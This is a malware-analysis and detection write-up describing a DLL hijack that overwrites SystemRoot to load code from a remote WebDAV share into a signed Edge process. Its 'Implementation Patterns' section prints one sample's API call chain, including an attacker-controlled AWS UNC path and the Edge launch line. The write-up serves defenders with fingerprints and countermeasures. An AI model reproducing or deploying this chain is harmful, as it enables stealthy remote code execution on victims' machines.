SystemRoot Poison DLL Hijack
Overview
A defense-evasion technique in which a stager overwrites the SystemRoot (and related windir / WINDIR) environment variables to point to an attacker-controlled UNC path before launching a signed Windows binary. When the target binary later loads a DLL via the standard search order, it resolves %SystemRoot%\system32\<target.dll> to the attacker’s remote share, loading and executing malicious code inside a trusted process context.
Detection / Fingerprint
- PE imports
SetEnvironmentVariableW,GetEnvironmentVariableW,ExpandEnvironmentStringsW, andCreateProcessWfromKERNEL32.dllonly. - No
.rsrcsection (no icons, no manifest — typical for minimalist stagers). - Hardcoded paths to
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeor similar signed binaries. - Environment-variable names (
SystemRoot,SYSTEMROOT,windir,WINDIR) appear as wide strings. - UNC path containing
@SSL@<port>syntax for HTTPS WebDAV/SMB-over-SSL tunneling.
Implementation Patterns Observed
Sample f8ab87be57e4 demonstrates the full chain:
SetEnvironmentVariableW(L"SystemRoot", L"\\\\mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com@SSL@443\\cv")SetEnvironmentVariableW(L"SYSTEMROOT", …)— same valueSetEnvironmentVariableW(L"windir", …)— same valueSetEnvironmentVariableW(L"WINDIR", …)— same valueGetFileAttributesWon both Edge install paths.ExpandEnvironmentStringsW(L"%TEMP%\\edge_sideload", …)for profile staging.- Format command line:
"<edge_path>" --no-first-run --no-default-browser-check --user-data-dir="%TEMP%\edge_sideload" --new-window https://pdfobject.com/pdf/sample.pdf CreateProcessWto launch Edge.
When Edge starts and initializes Winsock, the loader searches for mswsock.dll. The poisoned SystemRoot causes the search to hit \\mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com@SSL@443\cv\system32\mswsock.dll, which the attacker serves as a malicious DLL.
Defensive Countermeasures
- Block WebDAV UNC paths at the perimeter: Deny outbound SMB/WebDAV-over-HTTPS (
@SSL@syntax) to untrusted endpoints. - Monitor for
SystemRootmodifications: EDR telemetry onSetEnvironmentVariableWwithSystemRootas the target, especially from non-system processes. - DLL load auditing: Enable Microsoft-Windows-DLL-Load/Audit events and alert on
%SystemRoot%resolving to a UNC path. - Application control (WDAC/AppLocker): Block console PEs that launch Edge with
--user-data-dirin%TEMP%from non-standard paths.
Pages Where Observed
- unattributed — sample
f8ab87be57e4